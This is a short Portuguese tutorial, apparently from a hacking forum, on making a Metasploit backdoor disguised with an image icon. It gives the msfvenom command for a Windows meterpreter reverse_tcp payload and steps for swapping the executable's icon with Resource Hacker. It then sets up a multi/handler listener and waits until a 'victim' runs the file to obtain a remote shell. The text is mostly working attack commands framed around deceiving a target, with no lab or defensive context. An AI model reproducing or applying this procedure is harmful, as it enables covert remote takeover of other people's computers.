Metasploit – Backdoor em icones

Categorias: , , ,

Descrição

Vamos criar o payload, já tenha a imagem baixada, para facilitar salve como payload.formatodaimg

Código: Selecionar todos

msfvenom -p windows/meterpreter/reverse_tcp LHOST=seuhost LPORT=suaporta -f exe > payload.exe

Vamos iniciar o console

Código: Selecionar todos

msfconsole

Em outro terminal execute o comando seguinte

Código: Selecionar todos

convert payload.jpg -resize 90x60 backdoor.ico

Em uma máquina windows é necessário que instala o Resource Hacker e mova os arquivos para o windows, o arquivo.ico e o payload.exe
Abra o Resource Hacker e selecione o payload.exe, vá em “icon group” e clica em “add binary source” e seleciona o ícone depois clique em “add resource”
Agora clique em “Action” depois em “Replace icon” e selecione o ícone e clique em “Replace” e clique em salvar

Ele criará um novo arquivo com o ícone, esse arquivo é a backdoor

Volte ao console e seleciona o exploit

Código: Selecionar todos

use exploit/multi/handler

Sete o payload

Código: Selecionar todos

set PAYLOAD windows/meterpreter/reverse_tcp

Sete o host

Código: Selecionar todos

set LHOST seuhost

Sete a porta

Código: Selecionar todos

set LPORT suaporta

Agora dê um exploit

Código: Selecionar todos

exploit -j

Aguarde até que vítima execute o “ícone”, quando ela executar você terá o shell